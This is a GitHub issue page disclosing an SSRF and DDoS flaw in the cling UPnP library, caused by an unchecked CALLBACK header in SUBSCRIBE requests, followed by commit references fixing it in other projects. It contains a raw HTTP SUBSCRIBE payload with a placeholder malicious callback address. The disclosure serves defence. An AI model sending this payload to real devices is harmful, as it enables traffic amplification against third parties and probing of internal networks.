Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

SSRF and DDOS vulnerability #253

Open
YYHYlh opened this issue Jun 10, 2020 · 0 comments
Open

SSRF and DDOS vulnerability #253

YYHYlh opened this issue Jun 10, 2020 · 0 comments

Comments

@YYHYlh
Copy link

YYHYlh commented Jun 10, 2020

The Upnp protocol implemented in the latest version of cling has a flaw, and the CALLBACK parameter in the request header of the service's subscribe request is not checked, resulting in the attacker using this flaw to send malicious data to the device developed using cling, which causes the device to specify to the attacker. A large amount of data is sent from the IP address of the IP address to implement a DDOS attack; at the same time, the vulnerability can be used to implement an SSRF attack on the intranet.
Payload is

SUBSCRIBE / HTTP/1.1
Host: localhost:9999
Accept-Encoding: identity
User-Agent: Callstranger Vulnerability Checker
CALLBACK: <Malicious address>
TIMEOUT: Second-300
NT: upnp:event
Content-Length: 0
JasonMahdjoub added a commit to JasonMahdjoub/MaDKitLanEdition that referenced this issue Sep 30, 2021
@JasonMahdjoub
Fix DDOS and SSRF security issues with Cling dependency
27c85a9 
Description : 4thline/cling#253
JasonMahdjoub added a commit to JasonMahdjoub/UPnPIGD that referenced this issue Mar 25, 2022
@JasonMahdjoub
Fix DDOS and SSRF issue : 4thline/cling#253
8a6d88e
JasonMahdjoub added a commit to JasonMahdjoub/UPnPIGD that referenced this issue Mar 25, 2022
@JasonMahdjoub
Fix DDOS and SSRF issue : 4thline/cling#253
5b7291e
JasonMahdjoub added a commit to JasonMahdjoub/MaDKitLanEdition that referenced this issue Mar 25, 2022
@JasonMahdjoub
Fix DDOS and SSRF issue : 4thline/cling#253
9df095e
JasonMahdjoub added a commit to JasonMahdjoub/MaDKitLanEdition that referenced this issue Mar 25, 2022
@JasonMahdjoub
Fix DDOS and SSRF issue : 4thline/cling#253
a85821d
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@YYHYlh